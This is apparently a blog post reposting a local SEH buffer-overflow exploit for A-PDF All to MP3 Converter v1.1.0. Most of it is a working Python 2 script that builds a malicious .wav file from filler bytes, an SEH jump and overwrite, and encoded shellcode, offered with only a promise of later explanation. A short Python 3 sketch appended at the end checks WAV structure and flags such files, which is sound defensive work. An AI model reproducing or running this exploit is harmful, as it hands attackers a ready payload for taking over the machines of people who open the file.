A-PDF All to MP3 Converter v.1.1.0 Universal Local SEH Exploit: Explanation of Functionality


Back on track... I was away for a while hhhh

To start with, here is a remake of the script at http://www.exploit-db.com/exploits/15033/, which I will explain some time later, together with how a BOF is created on Windows with SEH. More on that later...

# Python 2 script (uses the print statement)
from struct import *
import time

f = open("A-PDF All to MP3.wav", "w")

# Payload bytes, unchanged from the original post
shell = ("\x29\xc9\x83\xe9\xde\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x61"
         "\x28\x38\x56\x83\xeb\xfc\xe2\xf4\x9d\xc0\x7c\x56\x61\x28\xb3\x13"
         "\x5d\xa3\x44\x53\x19\x29\xd7\xdd\x2e\x30\xb3\x09\x41\x29\xd3\x1f"
         "\xea\x1c\xb3\x57\x8f\x19\xf8\xcf\xcd\xac\xf8\x22\x66\xe9\xf2\x5b"
         "\x60\xea\xd3\xa2\x5a\x7c\x1c\x52\x14\xcd\xb3\x09\x45\x29\xd3\x30"
         "\xea\x24\x73\xdd\x3e\x34\x39\xbd\xea\x34\xb3\x57\x8a\xa1\x64\x72"
         "\x65\xeb\x09\x96\x05\xa3\x78\x66\xe4\xe8\x40\x5a\xea\x68\x34\xdd"
         "\x11\x34\x95\xdd\x09\x20\xd3\x5f\xea\xa8\x88\x56\x61\x28\xb3\x3e"
         "\x5d\x77\x09\xa0\x01\x7e\xb1\xae\xe2\xe8\x43\x06\x09\xd8\xb2\x52"
         "\x3e\x40\xa0\xa8\xeb\x26\x6f\xa9\x86\x4b\x59\x3a\x02\x28\x38\x56")

print "Creating exploit."
time.sleep(1)
print "Creating exploit.."
time.sleep(1)
print "Creating exploit..."

# Filler written ahead of the SEH record
junk = "\x41" * 4132
print "Your shellcode size is:", len(shell)

# Next-SEH field: short jump (EB 06) followed by two NOPs
nseh = "\xeb\x06\x90\x90"
# SEH handler field, stored little-endian
seh = "\x75\x95\x00\x6d"  # 6d009575 POP ESI

try:
    f.write(junk + nseh + seh + shell)
    f.close()
    print "File created"
except:
    print "File cannot be created"
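The file written by the script above carries a .wav name but starts with filler bytes instead of a RIFF/WAVE header, so a structural check placed ahead of the converter flags it. The following Python 3 sketch is an added example, not part of the original post or the exploit-db entry; `check_wav`, `make_wav` and the sample inputs are hypothetical names and constructed data.

```python
import struct

def check_wav(data: bytes) -> list:
    """Return structural problems; an empty list means the RIFF/WAVE layout is sane."""
    if len(data) < 12:
        return ["shorter than the 12-byte RIFF header"]
    magic, riff_size, form = struct.unpack("<4sI4s", data[:12])
    if magic != b"RIFF" or form != b"WAVE":
        return ["missing RIFF/WAVE signature"]
    problems = []
    if riff_size + 8 != len(data):
        problems.append("RIFF size field does not match file length")
    pos, seen = 12, set()
    # Walk the chunk list: 4-byte id, 4-byte little-endian size, then the body.
    while pos + 8 <= len(data):
        chunk_id, chunk_size = struct.unpack("<4sI", data[pos:pos + 8])
        if pos + 8 + chunk_size > len(data):
            problems.append("chunk %r overruns the file" % chunk_id)
            break
        seen.add(chunk_id)
        pos += 8 + chunk_size + (chunk_size & 1)  # bodies are padded to even length
    for required in (b"fmt ", b"data"):
        if required not in seen:
            problems.append("missing %r chunk" % required)
    return problems

def make_wav(samples: bytes) -> bytes:
    """Build a minimal 8-bit mono PCM WAV (constructed input; even-length samples only)."""
    fmt = struct.pack("<4sIHHIIHH", b"fmt ", 16, 1, 1, 8000, 8000, 1, 8)
    body = b"WAVE" + fmt + struct.pack("<4sI", b"data", len(samples)) + samples
    return struct.pack("<4sI", b"RIFF", len(body)) + body

# Constructed samples: a well-formed file, and a stand-in with the same layout as
# the script's output (4132 filler bytes, then placeholder zero bytes, no payload).
GOOD = make_wav(b"\x80" * 16)
FILLER_ONLY = b"A" * 4132 + b"\x00" * 168
# Same well-formed file with the data chunk size field inflated to 4096.
INFLATED = GOOD[:40] + struct.pack("<I", 4096) + GOOD[44:]

if __name__ == "__main__":
    for name, blob in (("good", GOOD), ("filler", FILLER_ONLY), ("inflated", INFLATED)):
        print(name, check_wav(blob) or "ok")
```

A clean result only says the container layout is consistent; it does not show that the converter parses the file safely.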